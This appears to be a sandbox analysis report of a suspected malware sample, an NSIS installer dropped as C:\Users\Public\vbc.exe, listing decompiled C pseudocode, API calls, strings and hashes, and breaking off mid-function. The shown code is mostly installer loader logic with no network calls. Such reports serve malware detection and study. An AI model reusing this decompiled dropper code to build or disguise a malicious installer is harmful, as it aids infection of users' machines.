                                                                                                                                                                                                          						if(RegisterClassA(0x42ebe0) == 0) {
                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                                                                                                                                                          						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
                                                                                                                                                                                                          						goto L21;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t71 =  *(_t76 + 0x48);
                                                                                                                                                                                                          					_t86 = _t71;
                                                                                                                                                                                                          					if(_t71 == 0) {
                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t74 = 0x42e3e0;
                                                                                                                                                                                                          					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
                                                                                                                                                                                                          					_t57 =  *0x42e3e0; // 0x43
                                                                                                                                                                                                          					if(_t57 == 0) {
                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t57 == 0x22) {
                                                                                                                                                                                                          						_t74 = 0x42e3e1;
                                                                                                                                                                                                          						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                                                                                                                                          					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                          						E0040624D(_t80, E00405BE5(_t74));
                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t63 = GetFileAttributesA(_t74);
                                                                                                                                                                                                          						if(_t63 == 0xffffffff) {
                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                          							E00405C2C(_t74);
                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t92 = _t63 & 0x00000010;
                                                                                                                                                                                                          						if((_t63 & 0x00000010) != 0) {
                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}


























                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                                                                                                                                            • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?,?,?,004034F9,0000000B), ref: 00406683
                                                                                                                                                                                                          • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,00000000), ref: 00403ADB
                                                                                                                                                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76712754), ref: 00403B50
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                                                                                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403BB7
                                                                                                                                                                                                            • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                                                                                                                                                                          • RegisterClassA.USER32(0042EBE0), ref: 00403BF4
                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                                                                                                                                                          • CreateWindowExA.USER32 ref: 00403C41
                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBE0), ref: 00403CA3
                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042EBE0), ref: 00403CB0
                                                                                                                                                                                                          • RegisterClassA.USER32(0042EBE0), ref: 00403CB9
                                                                                                                                                                                                          • DialogBoxParamA.USER32 ref: 00403CD8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E00402EF1(void* __eflags, signed int _a4) {
                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                                                          				char _v300;
                                                                                                                                                                                                          				long _t54;
                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                          				intOrPtr* _t70;
                                                                                                                                                                                                          				long _t82;
                                                                                                                                                                                                          				signed int _t89;
                                                                                                                                                                                                          				intOrPtr _t92;
                                                                                                                                                                                                          				intOrPtr _t100;
                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                          				intOrPtr _t105;
                                                                                                                                                                                                          				long _t106;
                                                                                                                                                                                                          				long _t109;
                                                                                                                                                                                                          				void* _t110;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                          				 *0x42f450 = GetTickCount() + 0x3e8;
                                                                                                                                                                                                          				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
                                                                                                                                                                                                          				_t104 = E00405DE6("C:\\Users\\Public\\vbc.exe", 0x80000000, 3);
                                                                                                                                                                                                          				 *0x40a018 = _t104;
                                                                                                                                                                                                          				if(_t104 == 0xffffffff) {
                                                                                                                                                                                                          					return "Error launching installer";
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E0040624D("C:\\Users\\Public", "C:\\Users\\Public\\vbc.exe");
                                                                                                                                                                                                          				E0040624D(0x437000, E00405C2C("C:\\Users\\Public"));
                                                                                                                                                                                                          				_t54 = GetFileSize(_t104, 0);
                                                                                                                                                                                                          				 *0x429470 = _t54;
                                                                                                                                                                                                          				_t109 = _t54;
                                                                                                                                                                                                          				if(_t54 <= 0) {
                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                          					E00402E52(1);
                                                                                                                                                                                                          					if( *0x42f458 == 0) {
                                                                                                                                                                                                          						goto L30;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_v12 == 0) {
                                                                                                                                                                                                          						L26:
                                                                                                                                                                                                          						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                                                                                                                                          						_t110 = _t57;
                                                                                                                                                                                                          						_t105 = 8;
                                                                                                                                                                                                          						 *0x415458 = 0x40d450;
                                                                                                                                                                                                          						 *0x415454 = 0x40d450;
                                                                                                                                                                                                          						 *0x40b8b0 = _t105;
                                                                                                                                                                                                          						 *0x40bdcc = 0;
                                                                                                                                                                                                          						 *0x40bdc8 = 0;
                                                                                                                                                                                                          						 *0x415450 = 0x415450; // executed
                                                                                                                                                                                                          						E00405E15( &_v300, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
                                                                                                                                                                                                          						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                                                                                                                                                          						 *0x40a01c = _t62;
                                                                                                                                                                                                          						if(_t62 != 0xffffffff) {
                                                                                                                                                                                                          							_t65 = E0040343E( *0x42f458 + 0x1c);
                                                                                                                                                                                                          							 *0x429474 = _t65;
                                                                                                                                                                                                          							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                                                                                                                          							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                                                                                                                                                          							if(_t68 == _v20) {
                                                                                                                                                                                                          								 *0x42f454 = _t110;
                                                                                                                                                                                                          								 *0x42f45c =  *_t110;
                                                                                                                                                                                                          								if((_v40 & 0x00000001) != 0) {
                                                                                                                                                                                                          									 *0x42f460 =  *0x42f460 + 1;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t45 = _t110 + 0x44; // 0x44
                                                                                                                                                                                                          								_t70 = _t45;
                                                                                                                                                                                                          								_t100 = _t105;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t70 = _t70 - _t105;
                                                                                                                                                                                                          									 *_t70 =  *_t70 + _t110;
                                                                                                                                                                                                          									_t100 = _t100 - 1;
                                                                                                                                                                                                          								} while (_t100 != 0);
                                                                                                                                                                                                          								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
                                                                                                                                                                                                          								E00405DA1(0x42f480, _t110 + 4, 0x40);
                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L30;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					E0040343E( *0x429460);
                                                                                                                                                                                                          					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
                                                                                                                                                                                                          						goto L30;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						goto L26;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t106 = _t109;
                                                                                                                                                                                                          						asm("sbb eax, eax");
                                                                                                                                                                                                          						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
                                                                                                                                                                                                          						if(_t109 >= _t82) {
                                                                                                                                                                                                          							_t106 = _t82;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(E00403428(0x421460, _t106) == 0) {
                                                                                                                                                                                                          							E00402E52(1);
                                                                                                                                                                                                          							L30:
                                                                                                                                                                                                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if( *0x42f458 != 0) {
                                                                                                                                                                                                          							if((_a4 & 0x00000002) == 0) {
                                                                                                                                                                                                          								E00402E52(0);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L19;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E00405DA1( &_v40, 0x421460, 0x1c);
                                                                                                                                                                                                          						_t89 = _v40;
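                                                                                                                                                                                                          						// NSIS first-header check: siginfo 0xdeadbeef followed by the little-endian dwords "Null", "soft", "Inst" (magic "NullsoftInst").
                                                                                                                                                                                                          						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {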
                                                                                                                                                                                                          							_a4 = _a4 | _t89;
                                                                                                                                                                                                          							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
                                                                                                                                                                                                          							_t92 = _v16;
                                                                                                                                                                                                          							 *0x42f458 =  *0x429460;
                                                                                                                                                                                                          							if(_t92 > _t109) {
                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                                                                                                                                          								_v12 = _v12 + 1;
                                                                                                                                                                                                          								_t109 = _t92 - 4;
                                                                                                                                                                                                          								if(_t106 > _t109) {
                                                                                                                                                                                                          									_t106 = _t109;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								goto L22;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                          						if(_t109 <  *0x429470) {
                                                                                                                                                                                                          							_v8 = E0040670D(_v8, 0x421460, _t106);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *0x429460 =  *0x429460 + _t106;
                                                                                                                                                                                                          						_t109 = _t109 - _t106;
                                                                                                                                                                                                          					} while (_t109 != 0);
                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402F05
                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402F21
                                                                                                                                                                                                            • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DEA
                                                                                                                                                                                                            • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402F6A
                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 004030AF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                          • API String ID: 2803837635-1404970732
                                                                                                                                                                                                          • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                                                                                                                                          • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E00401759(FILETIME* __ebx, void* __eflags) {
                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                          				FILETIME* _t49;
                                                                                                                                                                                                          				FILETIME* _t62;
                                                                                                                                                                                                          				void* _t64;
                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                          				FILETIME* _t71;
                                                                                                                                                                                                          				FILETIME* _t75;
                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                          				CHAR* _t82;
                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t75 = __ebx;
                                                                                                                                                                                                          				_t82 = E00402BCE(0x31);
                                                                                                                                                                                                          				 *(_t85 - 8) = _t82;
                                                                                                                                                                                                          				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                                                                                                                                          				_t33 = E00405C52(_t82);
                                                                                                                                                                                                          				_push(_t82);
                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                          					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_push(0x40a450);
                                                                                                                                                                                                          					E0040624D();
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E00406528(0x40a450);
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					__eflags =  *(_t85 + 8) - 3;
                                                                                                                                                                                                          					if( *(_t85 + 8) >= 3) {
                                                                                                                                                                                                          						_t64 = E004065C1(0x40a450);
                                                                                                                                                                                                          						_t77 = 0;
                                                                                                                                                                                                          						__eflags = _t64 - _t75;
                                                                                                                                                                                                          						if(_t64 != _t75) {
                                                                                                                                                                                                          							_t71 = _t64 + 0x14;
                                                                                                                                                                                                          							__eflags = _t71;
                                                                                                                                                                                                          							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						asm("sbb eax, eax");
                                                                                                                                                                                                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                                                                                                                          						__eflags = _t70;
                                                                                                                                                                                                          						 *(_t85 + 8) = _t70;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                                                                                          					if( *(_t85 + 8) == _t75) {
                                                                                                                                                                                                          						E00405DC1(0x40a450);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags =  *(_t85 + 8) - 1;
                                                                                                                                                                                                          					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                                                                                                                          					__eflags = _t41 - 0xffffffff;
                                                                                                                                                                                                          					 *(_t85 - 0xc) = _t41;
                                                                                                                                                                                                          					if(_t41 != 0xffffffff) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                                                                                          					if( *(_t85 + 8) != _t75) {
                                                                                                                                                                                                          						E00405374(0xffffffe2,  *(_t85 - 8));
                                                                                                                                                                                                          						__eflags =  *(_t85 + 8) - 2;
                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L31:
                                                                                                                                                                                                          						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
                                                                                                                                                                                                          						__eflags =  *0x42f4e8;
                                                                                                                                                                                                          						goto L32;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						E0040624D(0x40ac50, 0x430000);
                                                                                                                                                                                                          						E0040624D(0x430000, 0x40a450);
                                                                                                                                                                                                          						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\Albus\AppData\Local\Temp\nsqE488.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                                                                                                                                          						E0040624D(0x430000, 0x40ac50);
                                                                                                                                                                                                          						_t62 = E00405969("C:\Users\Albus\AppData\Local\Temp\nsqE488.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                                                                                                                                          						__eflags = _t62;
                                                                                                                                                                                                          						if(_t62 == 0) {
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							__eflags = _t62 == 1;
                                                                                                                                                                                                          							if(_t62 == 1) {
                                                                                                                                                                                                          								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
                                                                                                                                                                                                          								L32:
                                                                                                                                                                                                          								_t49 = 0;
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_push(0x40a450);
                                                                                                                                                                                                          								_push(0xfffffffa);
                                                                                                                                                                                                          								E00405374();
                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                          								_t49 = 0x7fffffff;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L33:
                                                                                                                                                                                                          					return _t49;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E00405374(0xffffffea,  *(_t85 - 8));
                                                                                                                                                                                                          				 *0x42f514 =  *0x42f514 + 1;
                                                                                                                                                                                                          				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                                                                                                                                                                          				 *0x42f514 =  *0x42f514 - 1;
                                                                                                                                                                                                          				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                                                                                                                                          				_t80 = _t43;
                                                                                                                                                                                                          				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                          					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				CloseHandle( *(_t85 - 0xc)); // executed
                                                                                                                                                                                                          				__eflags = _t80 - _t75;
                                                                                                                                                                                                          				if(_t80 >= _t75) {
                                                                                                                                                                                                          					goto L31;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					__eflags = _t80 - 0xfffffffe;
                                                                                                                                                                                                          					if(_t80 != 0xfffffffe) {
                                                                                                                                                                                                          						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
                                                                                                                                                                                                          						lstrcatA(0x40a450,  *(_t85 - 8));
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(0x200010);
                                                                                                                                                                                                          					_push(0x40a450);
                                                                                                                                                                                                          					E00405969();
                                                                                                                                                                                                          					goto L29;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L33;
                                                                                                                                                                                                          			}

















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                                            • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                                                                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll$Call
                                                                                                                                                                                                          • API String ID: 1941528284-2162539042
                                                                                                                                                                                                          • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                                                                                                                                          • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                                          			E722F370F(intOrPtr _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                          				void* _v76;
                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                          				signed char _v84;
                                                                                                                                                                                                          				long _v88;
                                                                                                                                                                                                          				short _v90;
                                                                                                                                                                                                          				short _v92;
                                                                                                                                                                                                          				short _v94;
                                                                                                                                                                                                          				short _v96;
                                                                                                                                                                                                          				short _v98;
                                                                                                                                                                                                          				short _v100;
                                                                                                                                                                                                          				short _v102;
